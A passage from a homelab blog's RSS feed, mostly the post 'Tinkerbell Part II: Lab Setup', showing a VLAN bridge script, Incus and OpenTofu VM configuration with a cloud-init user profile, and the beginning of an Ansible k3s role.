</span></span><span style="display:flex;"><span>    <span style="color:#f92672">FS_TYPE</span>: <span style="color:#ae81ff">ext4</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">DEST_PATH</span>: <span style="color:#ae81ff">/etc/cloud/ds-identify.cfg</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">UID</span>: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">GID</span>: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">MODE</span>: <span style="color:#ae81ff">0600</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">DIRMODE</span>: <span style="color:#ae81ff">0700</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">CONTENTS</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      datasource: Ec2</span>
</span></span></code></pre></div><p>The first task adds some basic cloud-init configuration. Most importantly, the
URL for the metadata service. For most cloud providers, this is a hardcoded IP
over their entire cloud, but here it will be Tinkerbell&rsquo;s public IP as configured
in the Helm chart&rsquo;s <code>values.yaml</code>. Another important setting is to hardcode
the data source as <code>Ec2</code>, because cloud-init&rsquo;s default search mechanism checks
the aforementioned default IP, where it won&rsquo;t find any metadata service in my
Homelab.</p>
<p>With all of this configuration done, I was able to delete the VM one last time,
reset the Workflow object of Tinkerbell, and recreate the VM. After a couple of
minutes, I was greeted with a fully functional VM, ready for Ansible, with no
further manual intervention from my side.</p>
<h2 id="final-thoughts">Final thoughts</h2>
<p>I really like what I&rsquo;ve seen from Tinkerbell so far. I also like how well
cloud-init works. Even if I don&rsquo;t end up deploying Tinkerbell, I will likely
change my new host setup to use a generic image and then do the customization
with cloud-init.</p>
<p>The next steps will be the more complicated ones. There are two basic things
I will need to figure out. First, how to boot Raspberry Pi 4 and 5 into iPXE so
I can use Tinkerbell for provisioning them. From some initial research, it looks
like that should be possible. The bigger issue might be diskless hosts. Sure,
I can set up iPXE and provisioning - but the problem is then how to tell them
to boot into their own system, instead of Tinkerbell&rsquo;s provisioning, once they&rsquo;ve
been properly set up.</p>
<p>Let&rsquo;s see how those next experiments turn out.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Tinkerbell Part II: Lab Setup</title>
      <link>https://blog.mei-home.net/posts/tinkerbell-2-lab-setup/</link>
      <pubDate>Thu, 12 Jun 2025 00:30:11 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/tinkerbell-2-lab-setup/</guid>
      <description>Setting up the lab for Tinkerbell</description>
      <content:encoded><![CDATA[<p>A description of my lab setup for tinkering with Tinkerbell.</p>
<p>This is part 2 of my <a href="https://blog.mei-home.net/tags/series-tinkerbell/">Tinkerbell series</a>.</p>
<p><del>For my Tinkerbell tinkering lab</del> Actually, no. Let&rsquo;s start with: How
did I not come up with &ldquo;tinkering with Tinkerbell&rdquo; until the second post
of this series? You may tsk tsk tsk disapprovingly at your screen now.</p>
<p>For my Tinkerbell tinkering lab, I decided to run it on my desktop machine.
This is because previous work on network booting has shown that I definitely want
direct access to the netbooting machine&rsquo;s TTY. And that&rsquo;s easiest when it runs
on my desktop. Also makes stuff like packet capturing easier. So I needed the
following things in my lab setup:</p>
<ol>
<li>Fresh VLAN</li>
<li>VM tooling on my desktop</li>
<li>Ubuntu server VM for Tinkerbell</li>
<li>k3s, to run Tinkerbell</li>
</ol>
<p>In this post, I will go into a bit more detail on what that setup looks like.</p>
<h2 id="new-vlan">New VLAN</h2>
<p>In my Homelab VLAN, I&rsquo;ve already got two DHCP servers. One is from my OPNsense
router, providing the IPAM (IP Address Management) side of things. Then there&rsquo;s
also a <a href="https://thekelleys.org.uk/dnsmasq/doc.html">dnsmasq</a> instance running in
proxy mode and supplying the necessary info for netbooting, also serving as a
TFTP server.</p>
<p>This is definitely something I will need to tackle during the labbing phase - what
to do about diskless netbooting machines? For their first boot, they should go
with Tinkerbell for initial provisioning. But all subsequent boots should then
use the dnsmasq server and boot their normal kernel.</p>
<p>But for now, I&rsquo;m avoiding having to think about this by creating a separate VLAN
so Tinkerbell&rsquo;s DHCP doesn&rsquo;t disrupt the netbooting hosts. If you&rsquo;re curious about
the details, head to <a href="https://blog.mei-home.net/posts/vlans/">this post</a>. For now, suffice
it to say that I configured another fresh VLAN, let&rsquo;s say with the ID <code>512</code>, and
added it as a trunk VLAN to the router&rsquo;s main interface. Same for the rest of the
network path to my desktop. There, the VLAN is also configured trunked, so that
packets arrive on the host with their VLAN tag intact, allowing me to configure
a special interface on the host for just those packets. Importantly, I did not
set the desktop&rsquo;s switch port to autotag incoming packets (coming from the desktop)
with that VLAN ID. So all packets for this VLAN come into the
host tagged, and they also have to leave the host tagged.</p>
<p>Because I intended to have the lab up only while actively working on it, I didn&rsquo;t
do any config file changes, but instead wrote a small bash script to set up the
networking via <code>ip</code> commands:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#75715e">#!/bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>LAN<span style="color:#f92672">=</span>eth0
</span></span><span style="display:flex;"><span>VLANID<span style="color:#f92672">=</span><span style="color:#ae81ff">512</span>
</span></span><span style="display:flex;"><span>VLAN<span style="color:#f92672">=</span>$LAN.$VLANID
</span></span><span style="display:flex;"><span>BRIDGE<span style="color:#f92672">=</span>br
</span></span><span style="display:flex;"><span>IP<span style="color:#f92672">=</span>203.0.113.1/32
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> setup_net <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>  ip link add link $LAN name $VLAN type vlan id $VLANID
</span></span><span style="display:flex;"><span>  ip link add name $BRIDGE type bridge
</span></span><span style="display:flex;"><span>  ip link set $VLAN master $BRIDGE
</span></span><span style="display:flex;"><span>  ip link set $BRIDGE up
</span></span><span style="display:flex;"><span>  ip link set $VLAN up
</span></span><span style="display:flex;"><span>  ip addr add $IP dev $BRIDGE
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> teardown_net <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>  ip link set $BRIDGE down
</span></span><span style="display:flex;"><span>  ip link set $VLAN down
</span></span><span style="display:flex;"><span>  ip link delete $BRIDGE
</span></span><span style="display:flex;"><span>  ip link delete $VLAN
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">while</span> <span style="color:#f92672">[[</span> $# -gt <span style="color:#ae81ff">0</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">case</span> $1 in
</span></span><span style="display:flex;"><span>    up<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>      setup_net
</span></span><span style="display:flex;"><span>      shift
</span></span><span style="display:flex;"><span>      ;;
</span></span><span style="display:flex;"><span>    down<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>      teardown_net
</span></span><span style="display:flex;"><span>      shift
</span></span><span style="display:flex;"><span>      ;;
</span></span><span style="display:flex;"><span>    *<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>      echo <span style="color:#e6db74">&#34;Unknown argument&#34;</span>
</span></span><span style="display:flex;"><span>      exit <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>      ;;
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">esac</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span>
</span></span></code></pre></div><p>This script creates two new network devices. The first one, called <code>eth0.512</code>,
will serve as the VLAN interface, sitting &ldquo;on top&rdquo; of <code>eth0</code>, which is my physical
NIC. The <code>PHYSICAL.VLAN</code> naming is only a convention, not a requirement.
Then there&rsquo;s the <code>br</code> bridge, which can be imagined as a &ldquo;Virtual Switch&rdquo; simulated
by the Linux kernel. Multiple interfaces can be connected to it. And through the
<code>eth0.512</code> interface being part of it, the interface connected to the bridge
would have access to the rest of the network.</p>
<p>This type of bridge is a simple type - it is not aware of the VLANs at all, so
packets send between the hosts on the bridge would not be tagged. But any packets
which go into the wider network would do so via the <code>eth0.512</code> interface, and
would consequently get tagged with the <code>512</code> VLAN ID.</p>
<p>Now, one very important fact is that the IP address needs to be assigned to the
bridge, not to the VLAN interface. I initially had it assigned to the VLAN
IF, and it did not work at all, in that the packets did not arrive on the router
from the newly VLAN 512 interface, and packets send from other hosts to the IP
assigned to the interface never arrived at all.
I&rsquo;m honestly not really able to explain why that was. Which tells
me, yet again, that at some point I need to take a tour through the Linux
kernel&rsquo;s networking stack.</p>
<h2 id="vm-setup">VM setup</h2>
<p>I had to think a lot about this part, surprisingly. My normal go-to tool for VMs
has always been LXD. I ran my VMs via it for a couple of years during the
&ldquo;one host, multiple VMs&rdquo; phase of my Homelab. Then I pulled it out again to supply
some VMs during the k8s migration. I&rsquo;m pretty comfortable with it, and I like that
it has a Terraform provider so I could put my VM configs under version control.</p>
<p>In <a href="https://blog.mei-home.net/posts/testvm-for-netbooting/">some previous desktop VM&rsquo;ing</a>,
I had opted to set up the VM directly with the <code>qemu-system</code> command. But I wanted
a little bit more structure this time, because I expect this lab to last a bit
longer.</p>
<p>These were the two extremes I was thinking about - LXD (or rather, <a href="https://linuxcontainers.org/incus/">Incus</a>),
requiring a daemon to run and some additional setup, or a bash script for
launching the VM via <code>qemu-system</code>. I was looking for something in the middle -
without a daemon, but a bit less DIY than a bash script.</p>
<p>Initially, <a href="https://developer.hashicorp.com/vagrant">Vagrant</a> looked exactly
like what I was looking for. I was a bit dismayed when I saw that it was seemingly
written in Ruby though. Nothing wrong with Ruby, but it&rsquo;s not something I have
installed on my desktop. But I went ahead and got right to writing a Vagrant
file - just to find this note on <a href="https://documentation.ubuntu.com/public-images/public-images-explanation/vagrant/#support">Ubuntu&rsquo;s Vagrant page</a>:</p>
<blockquote>
<p>Vagrant has been dropped by Ubuntu due to the adoption of the Business Source License (BSL). Following this change, Canonical will no longer publish Vagrant images directly starting with Ubuntu 24.04 LTS (Noble Numbat).</p></blockquote>
<p>So much for that idea. And I didn&rsquo;t want to run any other distro, as the entire
Homelab is based on Ubuntu, and at least for now I don&rsquo;t intend to change that.
I then looked into stuff like <a href="https://www.libvirt.org/manpages/virsh.html">virtsh</a>.
But that then turned out to also require a daemon. And at that point I decided
that Incus really was the best choice - at least I was already experienced with
it, so I could spend more time on setting up Tinkerbell and less on setting up
the lab.</p>
<p>With that decision made, I ran the Incus install:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>emerge -av incus
</span></span></code></pre></div><p>The Gentoo Wiki has a <a href="https://wiki.gentoo.org/wiki/Incus">good page on Incus</a>.
Following it, I also added my user to the required groups for being allowed to
use Incus directly:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>usermod --append --groups incus,incus-admin &lt;MYUSER&gt;
</span></span></code></pre></div><p>Then I could launch Incus like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>rc-service incus start
</span></span></code></pre></div><p>As said, I only wanted the lab to be up when I&rsquo;m actually working with it, so
I did not autostart it.</p>
<p>Finally, I initialized Incus with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>incus admin init
</span></span></code></pre></div><p>I basically said &ldquo;no&rdquo; to everything, so I could set up stuff like default
networking and the default storage provider in OpenTofu later and put that config
under version control.</p>
<h2 id="setting-up-the-master-vm-with-opentofu">Setting up the Master VM with OpenTofu</h2>
<p>To configure Incus, I made use of the <a href="https://search.opentofu.org/provider/lxc/incus/v0.3.1">OpenTofu Incus provider</a>.
I didn&rsquo;t use the Incus CLI because I wanted to put the config under source control.
Even though I&rsquo;m still on <a href="https://developer.hashicorp.com/terraform">Terraform</a>
for my Homelab as a whole, I decided to go with <a href="https://opentofu.org/">OpenTofu</a>
for the lab. I intended to keep the two states, Home(prod)lab and actual lab,
separate anyway. And I saw this as a good chance to kick the tires on OpenTofu.</p>
<p>My OpenTofu <code>main.tf</code> looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">terraform</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">backend</span> <span style="color:#e6db74">&#34;local&#34;</span> {
</span></span><span style="display:flex;"><span>    path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;.terraform/terraform-main.tfstate&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">required_providers</span> {
</span></span><span style="display:flex;"><span>    incus <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>      source <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;lxc/incus&#34;</span>
</span></span><span style="display:flex;"><span>      version <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;0.3.1&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">provider</span> <span style="color:#e6db74">&#34;incus&#34;</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">remote</span> {
</span></span><span style="display:flex;"><span>    name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local&#34;</span>
</span></span><span style="display:flex;"><span>    default <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    scheme <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;unix&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Nothing special here at all. So next, setting up some defaults for the VMs. First
step: Some storage. I just went with local storage - in the name of not overcomplicating
the lab setup unnecessarily (yes, I <em>can</em> see that smirk on your face right now):</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;incus_storage_pool&#34; &#34;local-dir&#34;</span> {
</span></span><span style="display:flex;"><span>  name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local-dir&#34;</span>
</span></span><span style="display:flex;"><span>  description <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Local host storage pool&#34;</span>
</span></span><span style="display:flex;"><span>  driver <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;dir&#34;</span>
</span></span><span style="display:flex;"><span>  config <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    source <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/var/lib/incus/storage-pools/local-dir&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Next comes the base profile for the VMs:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;incus_profile&#34; &#34;base&#34;</span> {
</span></span><span style="display:flex;"><span>  name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;base&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  config <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    &#34;boot.autostart&#34; <span style="color:#f92672">=</span> <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    &#34;cloud-init.vendor-data&#34; <span style="color:#f92672">=</span> <span style="color:#960050;background-color:#1e0010">&lt;&lt;-</span><span style="color:#66d9ef">EOT</span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">#cloud-config
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">users</span><span style="color:#960050;background-color:#1e0010">:</span>
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">-</span> <span style="color:#66d9ef">name</span><span style="color:#960050;background-color:#1e0010">:</span> <span style="color:#66d9ef">ansible</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">user</span>
</span></span><span style="display:flex;"><span>    sudo: ALL<span style="color:#f92672">=</span>(<span style="color:#66d9ef">ALL</span><span style="color:#960050;background-color:#1e0010">:</span><span style="color:#66d9ef">ALL</span>) <span style="color:#66d9ef">ALL</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">ssh_authorized_keys</span><span style="color:#960050;background-color:#1e0010">:</span>
</span></span><span style="display:flex;"><span>      - from<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;192.0.2.100&#34;</span> <span style="color:#66d9ef">ssh</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">ed25519</span> <span style="color:#66d9ef">AAAAC3NzaC1lZDI1NTE5AAAAIOaxn8l16GNyBEgYzWO0BAko9fw8kkIq9tbels3hXdUt</span> <span style="color:#66d9ef">user</span><span style="color:#960050;background-color:#1e0010">@</span><span style="color:#66d9ef">foo</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">shell</span><span style="color:#960050;background-color:#1e0010">:</span> <span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">bin</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">bash</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">packages</span><span style="color:#960050;background-color:#1e0010">:</span>
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">-</span> <span style="color:#66d9ef">sudo</span>
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">-</span> <span style="color:#66d9ef">python3</span>
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">-</span> <span style="color:#66d9ef">openssh</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">server</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">chpasswd</span><span style="color:#960050;background-color:#1e0010">:</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">expire</span><span style="color:#960050;background-color:#1e0010">:</span> <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">users</span><span style="color:#960050;background-color:#1e0010">:</span>
</span></span><span style="display:flex;"><span>    <span style="color:#960050;background-color:#1e0010">-</span> <span style="color:#66d9ef">name</span><span style="color:#960050;background-color:#1e0010">:</span> <span style="color:#66d9ef">ansible</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">password</span><span style="color:#960050;background-color:#1e0010">:</span> <span style="color:#66d9ef">password123</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">type</span><span style="color:#960050;background-color:#1e0010">:</span> <span style="color:#66d9ef">text</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">EOT</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">device</span> {
</span></span><span style="display:flex;"><span>    name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;network&#34;</span>
</span></span><span style="display:flex;"><span>    type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;nic&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    properties <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>      nictype <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bridged&#34;</span>
</span></span><span style="display:flex;"><span>      parent <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;br&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Let&rsquo;s start with the network config. Here, I&rsquo;m configuring the VM to make use
of the <code>br</code> bridge I created above. The <code>bridged</code> device type will create a NIC
which is part of the given bridge device, meaning it is connected to that bridge
and will be able to use it to communicate with other connected hosts. In my
setup, this config also allows all connected devices to communicate with the
outside world.</p>
<p>Then there&rsquo;s also the <code>vendor-data</code> config. This is a <a href="https://cloud-init.io/">cloud-init</a>
configuration file. Cloud-init was introduced for Ubuntu, but has been adopted
by a number of other distributions as well. It&rsquo;s main usage is as a tool to
do initial configuration of a generic OS image. On systems supporting cloud-init,
there are generally multiple levels of e.g. systemd services running during boot.
Those can configure the network as well as create users, install packages and
set passwords and a whole host of other things. Generally, these configs are only executed once, during the
initial boot of the machine. Switching to cloud-init is one of the goals during
my Tinkerbell migration. Up to now, I&rsquo;ve been creating individual images for
each new host, which contained pretty much only the above configuration. Which
was a bit of a waste, considering that I really only needed to do some very
light customization, with the sole goal being that after first boot, the machine
would be ready for my main Ansible playbook to run.</p>
<p>This particular cloud-init config does exactly that. It installs Python and
the OpenSSH server. Surprisingly, the Incus Ubuntu images don&rsquo;t come with SSH
configured by default. Then I&rsquo;m creating the <code>ansible-user</code> user, which is the
user all of my Ansible playbooks use for connecting to the hosts in my Homelab.
The config adds the user itself, sets the shell and adds my Ansible SSH key
to the <code>authorized_keys</code>, allowing access only from my Command and Control host.
The user also has full sudo access.
Finally, I&rsquo;m setting a simple password initially, which is then changed to the
actual password during the initial Ansible playbook run. This is probably a bit
unsafe, and I plan to look into doing this better, for now it serves reasonably
well, because I need a password for sudo access even for the first playbook run.</p>
<p>I&rsquo;ve also got a small second profile, for creating hosts with disks:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;incus_profile&#34; &#34;disk-vms&#34;</span> {
</span></span><span style="display:flex;"><span>  name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;disk-vms&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">device</span> {
</span></span><span style="display:flex;"><span>    name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;root&#34;</span>
</span></span><span style="display:flex;"><span>    type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;disk&#34;</span>
</span></span><span style="display:flex;"><span>    properties <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>      pool <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${incus_storage_pool.local-dir.name}&#34;</span>
</span></span><span style="display:flex;"><span>      size <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;20GB&#34;</span>
</span></span><span style="display:flex;"><span>      path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>These two profiles are separate because I will also need to test how my diskless
netboot setup works with Tinkerbell provisioning. And honestly, I&rsquo;ve got a bad
feeling about it. But that&rsquo;s for the future. &#x1f62c;</p>
<p>The last thing to do: Actually create the VM.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;incus_instance&#34; &#34;master&#34;</span> {
</span></span><span style="display:flex;"><span>  name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;master&#34;</span>
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;virtual-machine&#34;</span>
</span></span><span style="display:flex;"><span>  image <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;images:ubuntu/24.04/cloud&#34;</span>
</span></span><span style="display:flex;"><span>  running <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  profiles <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;${incus_profile.base.name}&#34;</span>
</span></span><span style="display:flex;"><span>  ]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">device</span> {
</span></span><span style="display:flex;"><span>    name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;root&#34;</span>
</span></span><span style="display:flex;"><span>    type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;disk&#34;</span>
</span></span><span style="display:flex;"><span>    properties <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>      pool <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${incus_storage_pool.local-dir.name}&#34;</span>
</span></span><span style="display:flex;"><span>      size <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;50GB&#34;</span>
</span></span><span style="display:flex;"><span>      path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  config <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    &#34;limits.cpu&#34; <span style="color:#f92672">=</span> <span style="color:#ae81ff">6</span>
</span></span><span style="display:flex;"><span>    &#34;limits.memory&#34; <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;16GB&#34;</span>
</span></span><span style="display:flex;"><span>    &#34;cloud-init.user-data&#34; <span style="color:#f92672">=</span> <span style="color:#960050;background-color:#1e0010">&lt;&lt;-</span><span style="color:#66d9ef">EOT</span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">#cloud-config
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">hostname</span><span style="color:#960050;background-color:#1e0010">:</span> <span style="color:#66d9ef">master</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">EOT</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Nothing special about this config, it uses the previously discussed <code>base</code>
profile and adds a 50 GB disk to it. I&rsquo;ve configured it with 16GB of RAM, similar
to the Pi 5 which will ultimately host the setup.</p>
<p>A single <code>tofu apply</code> later, I had the main VM up and running, ready for the k3s
install.</p>
<h2 id="setting-up-k3s">Setting up k3s</h2>
<p>Tinkerbell is very much a Kubernetes application. Plus, I had started thinking
that standardizing on deploying everything possible in Kubernetes would be a
good thing. So regardless of whether Tinkerbell ultimately gets deployed or not,
I want a Kubernetes cluster on my cluster master host. After looking through the
current offerings, I decided on <a href="https://k3s.io/">k3s</a> as the Kubernetes distro
to use. Mostly because it seems to be the standard. While I normally instinctively
reach for the &ldquo;vanilla&rdquo; version of everything, I already know that kubeadm is
not exactly friendly to single-node deployments.</p>
<p>For the deployment on the test VM, I adapted <a href="https://github.com/k3s-io/k3s-ansible/tree/master">this Ansible role</a>.
With my adaptions, the role&rsquo;s <code>tasks/main.yml</code> looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Populate service facts</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.service_facts</span>:
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">get k3s installed version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.command</span>: <span style="color:#ae81ff">k3s --version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">register</span>: <span style="color:#ae81ff">k3s_version_output</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">changed_when</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ignore_errors</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">set k3s installed version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">not ansible_check_mode and k3s_version_output.rc == 0</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.set_fact</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">installed_k3s_version</span>: <span style="color:#e6db74">&#34;{{ k3s_version_output.stdout_lines[0].split(&#39; &#39;)[2] }}&#34;</span>
